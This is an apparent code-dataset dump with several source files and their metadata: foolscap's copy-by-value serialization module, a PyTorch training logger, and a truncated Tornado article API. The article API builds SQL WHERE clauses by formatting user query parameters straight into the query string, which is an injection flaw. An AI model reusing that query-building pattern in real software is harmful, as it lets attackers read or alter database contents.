unslicer = self.open(opentype)
if unslicer:
if self.attrConstraint:
unslicer.setConstraint(self.attrConstraint)
return unslicer
def receiveChild(self, obj, ready_deferred=None):
assert not isinstance(obj, defer.Deferred)
assert ready_deferred is None
if self.attrname == None:
attrname = six.ensure_str(obj)
if attrname in self.d:
raise BananaError("duplicate attribute name '%s'" % attrname)
s = self.schema
if s:
accept, self.attrConstraint = s.getAttrConstraint(attrname)
assert accept
self.attrname = attrname
else:
if isinstance(obj, defer.Deferred):
# TODO: this is an artificial restriction, and it might
# be possible to remove it, but I need to think through
# it carefully first
raise BananaError("unreferenceable object in attribute")
self.setAttribute(self.attrname, obj)
self.attrname = None
self.attrConstraint = None
def setAttribute(self, name, value):
self.d[name] = value
def receiveClose(self):
try:
obj = self.factory(self.d)
except:
log.msg("%s.receiveClose: problem in factory %s" %
(self.__class__.__name__, self.factory))
log.err()
raise
self.protocol.setObject(self.count, obj)
self.deferred.callback(obj)
return obj, None
def describe(self):
if self.classname == None:
return "<??>"
me = "<%s>" % self.classname
if self.attrname is None:
return "%s.attrname??" % me
else:
return "%s.%s" % (me, self.attrname)
class NonCyclicRemoteCopyUnslicer(RemoteCopyUnslicer):
# The Deferred used in RemoteCopyUnslicer (used in case the RemoteCopy
# is participating in a reference cycle, say 'obj.foo = obj') makes it
# unsuitable for holding Failures (which cannot be passed through
# Deferred.callback). Use this class for Failures. It cannot handle
# reference cycles (they will cause a KeyError when the reference is
# followed).
def start(self, count):
self.d = {}
self.count = count
self.gettingAttrname = True
def receiveClose(self):
obj = self.factory(self.d)
return obj, None
class IRemoteCopy(Interface):
"""This interface defines what a RemoteCopy class must do. RemoteCopy
subclasses are used as factories to create objects that correspond to
Copyables sent over the wire.
Note that the constructor of an IRemoteCopy class will be called without
any arguments.
"""
def setCopyableState(statedict):
"""I accept an attribute dictionary name/value pairs and use it to
set my internal state.
Some of the values may be Deferreds, which are placeholders for the
as-yet-unreferenceable object which will eventually go there. If you
receive a Deferred, you are responsible for adding a callback to
update the attribute when it fires. [note:
RemoteCopyUnslicer.receiveChild currently has a restriction which
prevents this from happening, but that may go away in the future]
Some of the objects referenced by the attribute values may have
Deferreds in them (e.g. containers which reference recursive tuples).
Such containers are responsible for updating their own state when
those Deferreds fire, but until that point their state is still
subject to change. Therefore you must be careful about how much state
inspection you perform within this method."""
stateSchema = interface.Attribute("""I return an AttributeDictConstraint
object which places restrictions on incoming attribute values. These
restrictions are enforced as the tokens are received, before the state is
passed to setCopyableState.""")
# This maps typename to an Unslicer factory
CopyableRegistry = {}
def registerRemoteCopyUnslicerFactory(typename, unslicerfactory,
registry=None):
"""Tell PB that unslicerfactory can be used to handle Copyable objects
that provide a getTypeToCopy name of 'typename'. 'unslicerfactory' must
be a callable which takes no arguments and returns an object which
provides IUnslicer.
"""
assert callable(unslicerfactory)
# in addition, it must produce a tokens.IUnslicer . This is safe to do
# because Unslicers don't do anything significant when they are created.
test_unslicer = unslicerfactory()
assert tokens.IUnslicer.providedBy(test_unslicer)
assert type(typename) is str
if registry == None:
registry = CopyableRegistry
assert typename not in registry
registry[typename] = unslicerfactory
# this keeps track of everything submitted to registerRemoteCopyFactory
debug_CopyableFactories = {}
def registerRemoteCopyFactory(typename, factory, stateSchema=None,
cyclic=True, registry=None):
"""Tell PB that 'factory' can be used to handle Copyable objects that
provide a getTypeToCopy name of 'typename'. 'factory' must be a callable
which accepts a state dictionary and returns a fully-formed instance.
'cyclic' is a boolean, which should be set to False to avoid using a
Deferred to provide the resulting RemoteCopy instance. This is needed to
deserialize Failures (or instances which inherit from one, like
CopiedFailure). In exchange for this, it cannot handle reference cycles.
"""
assert callable(factory)
debug_CopyableFactories[typename] = (factory, stateSchema, cyclic)
if cyclic:
def _RemoteCopyUnslicerFactory():
return RemoteCopyUnslicer(factory, stateSchema)
registerRemoteCopyUnslicerFactory(typename,
_RemoteCopyUnslicerFactory,
registry)
else:
def _RemoteCopyUnslicerFactoryNonCyclic():
return NonCyclicRemoteCopyUnslicer(factory, stateSchema)
registerRemoteCopyUnslicerFactory(typename,
_RemoteCopyUnslicerFactoryNonCyclic,
registry)
# this keeps track of everything submitted to registerRemoteCopy, which may
# be useful when you're wondering what's been auto-registered by the
# RemoteCopy metaclass magic
debug_RemoteCopyClasses = {}
def registerRemoteCopy(typename, remote_copy_class, registry=None):
"""Tell PB that remote_copy_class is the appropriate RemoteCopy class to
use when deserializing a Copyable sequence that is tagged with
'typename'. 'remote_copy_class' should be a RemoteCopy subclass or
implement the same interface, which means its constructor takes no
arguments and it has a setCopyableState(state) method to actually set the
instance's state after initialization. It must also have a nonCyclic
attribute.
"""
assert IRemoteCopy.implementedBy(remote_copy_class)
assert type(typename) is str
debug_RemoteCopyClasses[typename] = remote_copy_class
def _RemoteCopyFactory(state):
obj = remote_copy_class()
obj.setCopyableState(state)
return obj
registerRemoteCopyFactory(typename, _RemoteCopyFactory,
remote_copy_class.stateSchema,
not remote_copy_class.nonCyclic,
registry)
class RemoteCopyClass(type):
# auto-register RemoteCopy classes
def __init__(self, name, bases, dict):
type.__init__(self, name, bases, dict)
# don't try to register RemoteCopy itself
if name == "RemoteCopy" and _RemoteCopyBase in bases:
#print "not auto-registering %s %s" % (name, bases)
return
if "copytype" not in dict:
# TODO: provide a file/line-number for the class
raise RuntimeError("RemoteCopy subclass %s must specify 'copytype'"
% name)
copytype = dict['copytype']
if copytype:
registry = dict.get('copyableRegistry', None)
registerRemoteCopy(copytype, self, registry)
@implementer(IRemoteCopy)
class _RemoteCopyBase:
stateSchema = None # always a class attribute
nonCyclic = False
def __init__(self):
# the constructor will always be called without arguments
pass
def setCopyableState(self, state):
self.__dict__ = state
class RemoteCopyOldStyle(_RemoteCopyBase):
# note that these will not auto-register for you, because old-style
# classes do not do metaclass magic
copytype = None
@six.add_metaclass(RemoteCopyClass)
class RemoteCopy(_RemoteCopyBase, object):
# Set 'copytype' to a unique string that is shared between the
# sender-side Copyable and the receiver-side RemoteCopy. This RemoteCopy
# subclass will be auto-registered using the 'copytype' name. Set
# copytype to None to disable auto-registration.
pass
class AttributeDictConstraint(OpenerConstraint):
"""This is a constraint for dictionaries that are used for attributes.
All keys are short strings, and each value has a separate constraint.
It could be used to describe instance state, but could also be used
to constraint arbitrary dictionaries with string keys.
Some special constraints are legal here: Optional.
"""
opentypes = [("attrdict",)]
name = "AttributeDictConstraint"
def __init__(self, *attrTuples, **kwargs):
self.ignoreUnknown = kwargs.get('ignoreUnknown', False)
self.acceptUnknown = kwargs.get('acceptUnknown', False)
self.keys = {}
for name, constraint in (list(attrTuples) +
list(kwargs.get('attributes', {}).items())):
assert name not in list(self.keys.keys())
self.keys[name] = IConstraint(constraint)
def getAttrConstraint(self, attrname):
c = self.keys.get(attrname)
if c:
if isinstance(c, Optional):
c = c.constraint
return (True, c)
# unknown attribute
if self.ignoreUnknown:
return (False, None)
if self.acceptUnknown:
return (True, None)
raise Violation("unknown attribute '%s'" % attrname)
def checkObject(self, obj, inbound):
if type(obj) != type({}):
raise Violation("'%s' (%s) is not a Dictionary" % (obj,
type(obj)))
allkeys = list(self.keys.keys())
for k in list(obj.keys()):
try:
constraint = self.keys[k]
allkeys.remove(k)
except KeyError:
if not self.ignoreUnknown:
raise Violation("key '%s' not in schema" % k)
else:
# hmm. kind of a soft violation. allow it for now.
pass
else:
constraint.checkObject(obj[k], inbound)
for k in allkeys[:]:
if isinstance(self.keys[k], Optional):
allkeys.remove(k)
if allkeys:
raise Violation("object is missing required keys: %s" % \
",".join(allkeys))
|
# -*- test-case-name: foolscap.test.test_copyable -*-
# this module is responsible for all copy-by-value objects
import six
from zope.interface import interface, implementer
from twisted.python import reflect, log
from twisted.python.components import registerAdapter
from twisted.internet import defer
from . import slicer, tokens
from .tokens import BananaError, Violation
from foolscap.constraint import OpenerConstraint, IConstraint, Optional
Interface = interface.Interface
############################################################
# the first half of this file is sending/serialization
class ICopyable(Interface):
"""I represent an object which is passed-by-value across PB connections.
"""
def getTypeToCopy():
"""Return a string which names the class. This string must match the
one that gets registered at the receiving end. This is typically a
URL of some sort, in a namespace which you control."""
def getStateToCopy():
"""Return a state dictionary (with plain-string keys) which will be
serialized and sent to the remote end. This state object will be
given to the receiving object's setCopyableState method."""
@implementer(ICopyable)
class Copyable(object):
# you *must* set 'typeToCopy'
def getTypeToCopy(self):
try:
copytype = self.typeToCopy
except AttributeError:
raise RuntimeError("Copyable subclasses must specify 'typeToCopy'")
return copytype
def getStateToCopy(self):
return self.__dict__
class CopyableSlicer(slicer.BaseSlicer):
"""I handle ICopyable objects (things which are copied by value)."""
def slice(self, streamable, banana):
self.streamable = streamable
yield b'copyable'
copytype = self.obj.getTypeToCopy()
assert isinstance(copytype, str)
yield six.ensure_binary(copytype)
state = self.obj.getStateToCopy()
for k,v in state.items():
yield six.ensure_binary(k)
yield v
def describe(self):
return "<%s>" % self.obj.getTypeToCopy()
registerAdapter(CopyableSlicer, ICopyable, tokens.ISlicer)
class Copyable2(slicer.BaseSlicer):
# I am my own Slicer. This has more methods than you'd usually want in a
# base class, but if you can't register an Adapter for a whole class
# hierarchy then you may have to use it.
def getTypeToCopy(self):
return reflect.qual(self.__class__)
def getStateToCopy(self):
return self.__dict__
def slice(self, streamable, banana):
self.streamable = streamable
yield b'instance'
yield six.ensure_binary(self.getTypeToCopy())
yield self.getStateToCopy()
def describe(self):
return "<%s>" % self.getTypeToCopy()
#registerRemoteCopy(typename, factory)
#registerUnslicer(typename, factory)
def registerCopier(klass, copier):
"""This is a shortcut for arranging to serialize third-party clases.
'copier' must be a callable which accepts an instance of the class you
want to serialize, and returns a tuple of (typename, state_dictionary).
If it returns a typename of None, the original class's fully-qualified
classname is used.
"""
klassname = reflect.qual(klass)
@implementer(ICopyable)
class _CopierAdapter:
def __init__(self, original):
self.nameToCopy, self.state = copier(original)
if self.nameToCopy is None:
self.nameToCopy = klassname
def getTypeToCopy(self):
return self.nameToCopy
def getStateToCopy(self):
return self.state
registerAdapter(_CopierAdapter, klass, ICopyable)
############################################################
# beyond here is the receiving/deserialization side
class RemoteCopyUnslicer(slicer.BaseUnslicer):
attrname = None
attrConstraint = None
def __init__(self, factory, stateSchema):
self.factory = factory
self.schema = stateSchema
def start(self, count):
self.d = {}
self.count = count
self.deferred = defer.Deferred()
self.protocol.setObject(count, self.deferred)
def checkToken(self, typebyte, size):
if self.attrname == None:
if typebyte not in (tokens.STRING, tokens.VOCAB):
raise BananaError("RemoteCopyUnslicer keys must be STRINGs")
else:
if self.attrConstraint:
self.attrConstraint.checkToken(typebyte, size)
def doOpen(self, opentype):
if self.attrConstraint:
self.attrConstraint.checkOpentype(opentype)
unslicer = self.open(opentype)
if unslicer:
if self.attrConstraint:
unslicer.setConstraint(self.attrConstraint)
return unslicer
def receiveChild(self, obj, ready_deferred=None):
assert not isinstance(obj, defer.Deferred)
assert ready_deferred is None
if self.attrname == None:
attrname = six.ensure_str(obj)
if attrname in self.d:
raise BananaError("duplicate attribute name '%s'" % attrname)
s = self.schema
if s:
accept, self.attrConstraint = s.getAttrConstraint(attrname)
assert accept
self.attrname = attrname
else:
if isinstance(obj, defer.Deferred):
# TODO: this is an artificial restriction, and it might
# be possible to remove it, but I need to think through
# it carefully first
raise BananaError("unreferenceable object in attribute")
self.setAttribute(self.attrname, obj)
self.attrname = None
self.attrConstraint = None
def setAttribute(self, name, value):
self.d[name] = value
def receiveClose(self):
try:
obj = self.factory(self.d)
except:
log.msg("%s.receiveClose: problem in factory %s" %
(self.__class__.__name__, self.factory))
log.err()
raise
self.protocol.setObject(self.count, obj)
self.deferred.callback(obj)
return obj, None
def describe(self):
if self.classname == None:
return "<??>"
me = "<%s>" % self.classname
if self.attrname is None:
return "%s.attrname??" % me
else:
return "%s.%s" % (me, self.attrname)
class NonCyclicRemoteCopyUnslicer(RemoteCopyUnslicer):
# The Deferred used in RemoteCopyUnslicer (used in case the RemoteCopy
# is participating in a reference cycle, say 'obj.foo = obj') makes it
# unsuitable for holding Failures (which cannot be passed through
# Deferred.callback). Use this class for Failures. It cannot handle
# reference cycles (they will cause a KeyError when the reference is
# followed).
def start(self, count):
self.d = {}
self.count = count
self.gettingAttrname = True
def receiveClose(self):
obj = self.factory(self.d)
return obj, None
class IRemoteCopy(Interface):
"""This interface defines what a RemoteCopy class must do. RemoteCopy
subclasses are used as factories to create objects that correspond to
Copyables sent over the wire.
Note that the constructor of an IRemoteCopy class will be called without
any arguments.
"""
def setCopyableState(statedict):
"""I accept an attribute dictionary name/value pairs and use it to
set my internal state.
Some of the values may be Deferreds, which are placeholders for the
as-yet-unreferenceable object which will eventually go there. If you
receive a Deferred, you are responsible for adding a callback to
update the attribute when it fires. [note:
RemoteCopyUnslicer.receiveChild currently has a restriction which
prevents this from happening, but that may go away in the future]
Some of the objects referenced by the attribute values may have
Deferreds in them (e.g. containers which reference recursive tuples).
Such containers are responsible for updating their own state when
those Deferreds fire, but until that point their state is still
subject to change. Therefore you must be careful about how much state
inspection you perform within this method."""
stateSchema = interface.Attribute("""I return an AttributeDictConstraint
object which places restrictions on incoming attribute values. These
restrictions are enforced as the tokens are received, before the state is
passed to setCopyableState.""")
# This maps typename to an Unslicer factory
CopyableRegistry = {}
def registerRemoteCopyUnslicerFactory(typename, unslicerfactory,
registry=None):
"""Tell PB that unslicerfactory can be used to handle Copyable objects
that provide a getTypeToCopy name of 'typename'. 'unslicerfactory' must
be a callable which takes no arguments and returns an object which
provides IUnslicer.
"""
assert callable(unslicerfactory)
# in addition, it must produce a tokens.IUnslicer . This is safe to do
# because Unslicers don't do anything significant when they are created.
test_unslicer = unslicerfactory()
assert tokens.IUnslicer.providedBy(test_unslicer)
assert type(typename) is str
if registry == None:
registry = CopyableRegistry
assert typename not in registry
registry[typename] = unslicerfactory
# this keeps track of everything submitted to registerRemoteCopyFactory
debug_CopyableFactories = {}
def registerRemoteCopyFactory(typename, factory, stateSchema=None,
cyclic=True, registry=None):
"""Tell PB that 'factory' can be used to handle Copyable objects that
provide a getTypeToCopy name of 'typename'. 'factory' must be a callable
which accepts a state dictionary and returns a fully-formed instance.
'cyclic' is a boolean, which should be set to False to avoid using a
Deferred to provide the resulting RemoteCopy instance. This is needed to
deserialize Failures (or instances which inherit from one, like
CopiedFailure). In exchange for this, it cannot handle reference cycles.
"""
assert callable(factory)
debug_CopyableFactories[typename] = (factory, stateSchema, cyclic)
if cyclic:
def _RemoteCopyUnslicerFactory():
return RemoteCopyUnslicer(factory, stateSchema)
registerRemoteCopyUnslicerFactory(typename,
_RemoteCopyUnslicerFactory,
registry)
else:
def _RemoteCopyUnslicerFactoryNonCyclic():
return NonCyclicRemoteCopyUnslicer(factory, stateSchema)
registerRemoteCopyUnslicerFactory(typename,
_RemoteCopyUnslicerFactoryNonCyclic,
registry)
# this keeps track of everything submitted to registerRemoteCopy, which may
# be useful when you're wondering what's been auto-registered by the
# RemoteCopy metaclass magic
debug_RemoteCopyClasses = {}
def registerRemoteCopy(typename, remote_copy_class, registry=None):
"""Tell PB that remote_copy_class is the appropriate RemoteCopy class to
use when deserializing a Copyable sequence that is tagged with
'typename'. 'remote_copy_class' should be a RemoteCopy subclass or
implement the same interface, which means its constructor takes no
arguments and it has a setCopyableState(state) method to actually set the
instance's state after initialization. It must also have a nonCyclic
attribute.
"""
assert IRemoteCopy.implementedBy(remote_copy_class)
assert type(typename) is str
debug_RemoteCopyClasses[typename] = remote_copy_class
def _RemoteCopyFactory(state):
obj = remote_copy_class()
obj.setCopyableState(state)
return obj
registerRemoteCopyFactory(typename, _RemoteCopyFactory,
remote_copy_class.stateSchema,
not remote_copy_class.nonCyclic,
registry)
class RemoteCopyClass(type):
# auto-register RemoteCopy classes
def __init__(self, name, bases, dict):
type.__init__(self, name, bases, dict)
# don't try to register RemoteCopy itself
if name == "RemoteCopy" and _RemoteCopyBase in bases:
#print "not auto-registering %s %s" % (name, bases)
return
if "copytype" not in dict:
# TODO: provide a file/line-number for the class
raise RuntimeError("RemoteCopy subclass %s must specify 'copytype'"
% name)
copytype = dict['copytype']
if copytype:
registry = dict.get('copyableRegistry', None)
registerRemoteCopy(copytype, self, registry)
@implementer(IRemoteCopy)
class _RemoteCopyBase:
stateSchema = None # always a class attribute
nonCyclic = False
def __init__(self):
# the constructor will always be called without arguments
pass
def setCopyableState(self, state):
self.__dict__ = state
class RemoteCopyOldStyle(_RemoteCopyBase):
# note that these will not auto-register for you, because old-style
# classes do not do metaclass magic
copytype = None
@six.add_metaclass(RemoteCopyClass)
class RemoteCopy(_RemoteCopyBase, object):
# Set 'copytype' to a unique string that is shared between the
# sender-side Copyable and the receiver-side RemoteCopy. This RemoteCopy
# subclass will be auto-registered using the 'copytype' name. Set
# copytype to None to disable auto-registration.
pass
class AttributeDictConstraint(OpenerConstraint):
"""This is a constraint for dictionaries that are used for attributes.
All keys are short strings, and each value has a separate constraint.
It could be used to describe instance state, but could also be used
to constraint arbitrary dictionaries with string keys.
Some special constraints are legal here: Optional.
"""
opentypes = [("attrdict",)]
name = "AttributeDictConstraint"
def __init__(self, *attrTuples, **kwargs):
self.ignoreUnknown = kwargs.get('ignoreUnknown', False)
self.acceptUnknown = kwargs.get('acceptUnknown', False)
self.keys = {}
for name, constraint in (list(attrTuples) +
list(kwargs.get('attributes', {}).items())):
assert name not in list(self.keys.keys())
self.keys[name] = IConstraint(constraint)
def getAttrConstraint(self, attrname):
c = self.keys.get(attrname)
if c:
if isinstance(c, Optional):
c = c.constraint
return (True, c)
# unknown attribute
if self.ignoreUnknown:
return (False, None)
if self.acceptUnknown:
return (True, None)
raise Violation("unknown attribute '%s'" % attrname)
def checkObject(self, obj, inbound):
if type(obj) != type({}):
raise Violation("'%s' (%s) is not a Dictionary" % (obj,
type(obj)))
allkeys = list(self.keys.keys())
for k in list(obj.keys()):
try:
constraint = self.keys[k]
allkeys.remove(k)
except KeyError:
if not self.ignoreUnknown:
raise Violation("key '%s' not in schema" % k)
else:
# hmm. kind of a soft violation. allow it for now.
pass
else:
constraint.checkObject(obj[k], inbound)
for k in allkeys[:]:
if isinstance(self.keys[k], Optional):
allkeys.remove(k)
if allkeys:
raise Violation("object is missing required keys: %s" % \
",".join(allkeys))
|
en
| 0.87542
|
# -*- test-case-name: foolscap.test.test_copyable -*- # this module is responsible for all copy-by-value objects ############################################################ # the first half of this file is sending/serialization I represent an object which is passed-by-value across PB connections. Return a string which names the class. This string must match the one that gets registered at the receiving end. This is typically a URL of some sort, in a namespace which you control. Return a state dictionary (with plain-string keys) which will be serialized and sent to the remote end. This state object will be given to the receiving object's setCopyableState method. # you *must* set 'typeToCopy' I handle ICopyable objects (things which are copied by value). # I am my own Slicer. This has more methods than you'd usually want in a # base class, but if you can't register an Adapter for a whole class # hierarchy then you may have to use it. #registerRemoteCopy(typename, factory) #registerUnslicer(typename, factory) This is a shortcut for arranging to serialize third-party clases. 'copier' must be a callable which accepts an instance of the class you want to serialize, and returns a tuple of (typename, state_dictionary). If it returns a typename of None, the original class's fully-qualified classname is used. ############################################################ # beyond here is the receiving/deserialization side # TODO: this is an artificial restriction, and it might # be possible to remove it, but I need to think through # it carefully first # The Deferred used in RemoteCopyUnslicer (used in case the RemoteCopy # is participating in a reference cycle, say 'obj.foo = obj') makes it # unsuitable for holding Failures (which cannot be passed through # Deferred.callback). Use this class for Failures. It cannot handle # reference cycles (they will cause a KeyError when the reference is # followed). This interface defines what a RemoteCopy class must do. RemoteCopy subclasses are used as factories to create objects that correspond to Copyables sent over the wire. Note that the constructor of an IRemoteCopy class will be called without any arguments. I accept an attribute dictionary name/value pairs and use it to set my internal state. Some of the values may be Deferreds, which are placeholders for the as-yet-unreferenceable object which will eventually go there. If you receive a Deferred, you are responsible for adding a callback to update the attribute when it fires. [note: RemoteCopyUnslicer.receiveChild currently has a restriction which prevents this from happening, but that may go away in the future] Some of the objects referenced by the attribute values may have Deferreds in them (e.g. containers which reference recursive tuples). Such containers are responsible for updating their own state when those Deferreds fire, but until that point their state is still subject to change. Therefore you must be careful about how much state inspection you perform within this method. I return an AttributeDictConstraint object which places restrictions on incoming attribute values. These restrictions are enforced as the tokens are received, before the state is passed to setCopyableState. # This maps typename to an Unslicer factory Tell PB that unslicerfactory can be used to handle Copyable objects that provide a getTypeToCopy name of 'typename'. 'unslicerfactory' must be a callable which takes no arguments and returns an object which provides IUnslicer. # in addition, it must produce a tokens.IUnslicer . This is safe to do # because Unslicers don't do anything significant when they are created. # this keeps track of everything submitted to registerRemoteCopyFactory Tell PB that 'factory' can be used to handle Copyable objects that provide a getTypeToCopy name of 'typename'. 'factory' must be a callable which accepts a state dictionary and returns a fully-formed instance. 'cyclic' is a boolean, which should be set to False to avoid using a Deferred to provide the resulting RemoteCopy instance. This is needed to deserialize Failures (or instances which inherit from one, like CopiedFailure). In exchange for this, it cannot handle reference cycles. # this keeps track of everything submitted to registerRemoteCopy, which may # be useful when you're wondering what's been auto-registered by the # RemoteCopy metaclass magic Tell PB that remote_copy_class is the appropriate RemoteCopy class to use when deserializing a Copyable sequence that is tagged with 'typename'. 'remote_copy_class' should be a RemoteCopy subclass or implement the same interface, which means its constructor takes no arguments and it has a setCopyableState(state) method to actually set the instance's state after initialization. It must also have a nonCyclic attribute. # auto-register RemoteCopy classes # don't try to register RemoteCopy itself #print "not auto-registering %s %s" % (name, bases) # TODO: provide a file/line-number for the class # always a class attribute # the constructor will always be called without arguments # note that these will not auto-register for you, because old-style # classes do not do metaclass magic # Set 'copytype' to a unique string that is shared between the # sender-side Copyable and the receiver-side RemoteCopy. This RemoteCopy # subclass will be auto-registered using the 'copytype' name. Set # copytype to None to disable auto-registration. This is a constraint for dictionaries that are used for attributes. All keys are short strings, and each value has a separate constraint. It could be used to describe instance state, but could also be used to constraint arbitrary dictionaries with string keys. Some special constraints are legal here: Optional. # unknown attribute # hmm. kind of a soft violation. allow it for now.
| 1.944322
| 2
|
divmachines/logging.py
|
DanielMorales9/FactorizationPyTorch
| 4
|
6627625
|
<filename>divmachines/logging.py
class Logger(object):
"""
Base class for logging.
"""
def __init__(self):
pass
def log(self, *args, **kwargs):
pass
def flush(self):
"""
Cancels all logs
"""
pass
class TrainingLogger(Logger):
"""
Training Logger a class that logs the training process.
It can be configured for storing the losses for each epoch
and for each batch.
Parameters
----------
batch: bool, optional
Flag for logging batch or not
"""
def __init__(self, batch=False):
super(TrainingLogger, self).__init__()
self._batch = batch
self._logs = []
self._losses = None
self._epochs = None
self._batches = None
@property
def losses(self):
"""
Getter for the losses
:return: list
losses
"""
if self._losses is None:
if self._batch:
self._losses = [a for a, _, _ in self._logs]
else:
self._losses = [a for a, _ in self._logs]
return self._losses
@property
def epochs(self):
"""
Getter for the epochs
:return: list
epochs
"""
if self._epochs is None:
if self._batch:
self._epochs = [b for _, b, _ in self._logs]
else:
self._epochs = [b for _, b in self._logs]
return self._epochs
@property
def batches(self):
"""
Getter for the Batches
If batch logging is not enable raise ValueError
:return: list
batches
"""
if not self._batch:
raise ValueError("Batch logging is disabled")
if self._batch is not None:
self._batches = [c for _, _, c in self._logs]
return self._batches
def log(self, loss, epoch, batch=None, cpu=False):
"""
Logging function
:param loss: float
Loss value for an epoch and/or batch
:param epoch: int
Iteration
:param batch: int, optional
Batch in the Iteration
:param cpu: bool, optional
Send to cpu
"""
if cpu:
loss = loss.data.cpu().numpy()[0]
else:
loss = loss.data.numpy()[0]
if self._batch:
if batch is None:
raise ValueError("Batch logging enabled without "
"providing batch value")
else:
self._logs.append((loss, epoch, batch))
else:
self._logs.append((loss, epoch))
def flush(self):
self._logs = []
|
<filename>divmachines/logging.py
class Logger(object):
"""
Base class for logging.
"""
def __init__(self):
pass
def log(self, *args, **kwargs):
pass
def flush(self):
"""
Cancels all logs
"""
pass
class TrainingLogger(Logger):
"""
Training Logger a class that logs the training process.
It can be configured for storing the losses for each epoch
and for each batch.
Parameters
----------
batch: bool, optional
Flag for logging batch or not
"""
def __init__(self, batch=False):
super(TrainingLogger, self).__init__()
self._batch = batch
self._logs = []
self._losses = None
self._epochs = None
self._batches = None
@property
def losses(self):
"""
Getter for the losses
:return: list
losses
"""
if self._losses is None:
if self._batch:
self._losses = [a for a, _, _ in self._logs]
else:
self._losses = [a for a, _ in self._logs]
return self._losses
@property
def epochs(self):
"""
Getter for the epochs
:return: list
epochs
"""
if self._epochs is None:
if self._batch:
self._epochs = [b for _, b, _ in self._logs]
else:
self._epochs = [b for _, b in self._logs]
return self._epochs
@property
def batches(self):
"""
Getter for the Batches
If batch logging is not enable raise ValueError
:return: list
batches
"""
if not self._batch:
raise ValueError("Batch logging is disabled")
if self._batch is not None:
self._batches = [c for _, _, c in self._logs]
return self._batches
def log(self, loss, epoch, batch=None, cpu=False):
"""
Logging function
:param loss: float
Loss value for an epoch and/or batch
:param epoch: int
Iteration
:param batch: int, optional
Batch in the Iteration
:param cpu: bool, optional
Send to cpu
"""
if cpu:
loss = loss.data.cpu().numpy()[0]
else:
loss = loss.data.numpy()[0]
if self._batch:
if batch is None:
raise ValueError("Batch logging enabled without "
"providing batch value")
else:
self._logs.append((loss, epoch, batch))
else:
self._logs.append((loss, epoch))
def flush(self):
self._logs = []
|
en
| 0.700204
|
Base class for logging. Cancels all logs Training Logger a class that logs the training process. It can be configured for storing the losses for each epoch and for each batch. Parameters ---------- batch: bool, optional Flag for logging batch or not Getter for the losses :return: list losses Getter for the epochs :return: list epochs Getter for the Batches If batch logging is not enable raise ValueError :return: list batches Logging function :param loss: float Loss value for an epoch and/or batch :param epoch: int Iteration :param batch: int, optional Batch in the Iteration :param cpu: bool, optional Send to cpu
| 3.197384
| 3
|
uaa-python/app/web/rest/article_api.py
|
suomitek/cubeai
| 0
|
6627626
|
import json
import tornado.web
from app.domain.article import Article
from app.service import token_service
from app.database import article_db
from app.utils import mytime
class ArticleApiA(tornado.web.RequestHandler):
async def post(self, *args, **kwargs):
token = token_service.get_token(self.request)
has_role = token.has_role('ROLE_CONTENT')
if not has_role:
self.send_error(403)
return
article = Article()
article.__dict__ = json.loads(str(self.request.body, encoding='utf-8'))
article.complete_attrs()
article.createdDate = mytime.now()
article.modifiedDate = mytime.now()
await article_db.create_article(article)
self.set_status(201)
self.finish()
async def put(self, *args, **kwargs):
token = token_service.get_token(self.request)
has_role = token.has_role('ROLE_CONTENT')
if not has_role:
self.send_error(403)
return
article = Article()
article.__dict__ = json.loads(str(self.request.body, encoding='utf-8'))
article.modifiedDate = mytime.now()
await article_db.update_article(article)
self.set_status(201)
self.finish()
async def get(self, *args, **kwargs):
uuid = self.get_argument('uuid', None)
authorLogin = self.get_argument('authorLogin', None)
subject1 = self.get_argument('subject1', None)
subject2 = self.get_argument('subject2', None)
subject3 = self.get_argument('subject3', None)
title = self.get_argument('title', None)
tag1 = self.get_argument('tag1', None)
tag2 = self.get_argument('tag2', None)
tag3 = self.get_argument('tag3', None)
filter = self.get_argument('filter', None)
pageable = {
'page': self.get_argument('page', None),
'size': self.get_argument('size', None),
'sort': self.get_arguments('sort'),
}
if uuid is not None:
result = await article_db.get_articles_by_uuid(uuid)
self.write(json.dumps(result))
return
where1 = ''
if authorLogin is not None:
where1 += 'and author_login = "{}" '.format(authorLogin)
if subject1 is not None:
where1 += 'and subject_1 = "{}" '.format(subject1)
if subject2 is not None:
where1 += 'and subject_2 = "{}" '.format(subject2)
if subject3 is not None:
where1 += 'and subject_3 = "{}" '.format(subject3)
if title is not None:
where1 += 'and title = "{}" '.format(title)
if tag1 is not None:
where1 += 'and tag_1 = "{}" '.format(tag1)
if tag2 is not None:
where1 += 'and tag_2 = "{}" '.format(tag2)
if tag3 is not None:
where1 += 'and tag_3 = "{}" '.format(tag3)
where1 = where1[4:]
where2 = ''
if filter is not None:
where2 += 'author_login like "%{}%"'.format(filter)
where2 += ' or author_name like "%{}%"'.format(filter)
where2 += ' or subject_1 like "%{}%"'.format(filter)
where2 += ' or subject_2 like "%{}%"'.format(filter)
where2 += ' or subject_3 like "%{}%"'.format(filter)
where2 += ' or title like "%{}%"'.format(filter)
where2 += ' or tag_1 like "%{}%"'.format(filter)
where2 += ' or tag_2 like "%{}%"'.format(filter)
where2 += ' or tag_3 like "%{}%"'.format(filter)
where = ''
if where1:
where += 'and {}'.format(where1)
if where2:
where += 'and {}'.format(where2)
if where:
where = where[4:]
if where != '':
where = 'WHERE ' + where
total_count, result = await article_db.get_articles(where, pageable)
self.set_header('X-Total-Count', total_count)
self.write(json.dumps(result))
class ArticleApiB(tornado.web.RequestHandler):
async def get(self, id, *args, **kwargs):
token = token_service.get_token(self.request)
has_role = token.has_role('ROLE_CONTENT')
if not has_role:
self.send_error(403)
return
result = await article_db.get_article(id)
self.write(result)
async def delete(self, id, *args, **kwargs):
token = token_service.get_token(self.request)
has_role = token.has_role('ROLE_CONTENT')
if not has_role:
self.send_error(403)
return
await article_db.delete_article(id)
self.set_status(200)
self.finish()
|
import json
import tornado.web
from app.domain.article import Article
from app.service import token_service
from app.database import article_db
from app.utils import mytime
class ArticleApiA(tornado.web.RequestHandler):
async def post(self, *args, **kwargs):
token = token_service.get_token(self.request)
has_role = token.has_role('ROLE_CONTENT')
if not has_role:
self.send_error(403)
return
article = Article()
article.__dict__ = json.loads(str(self.request.body, encoding='utf-8'))
article.complete_attrs()
article.createdDate = mytime.now()
article.modifiedDate = mytime.now()
await article_db.create_article(article)
self.set_status(201)
self.finish()
async def put(self, *args, **kwargs):
token = token_service.get_token(self.request)
has_role = token.has_role('ROLE_CONTENT')
if not has_role:
self.send_error(403)
return
article = Article()
article.__dict__ = json.loads(str(self.request.body, encoding='utf-8'))
article.modifiedDate = mytime.now()
await article_db.update_article(article)
self.set_status(201)
self.finish()
async def get(self, *args, **kwargs):
uuid = self.get_argument('uuid', None)
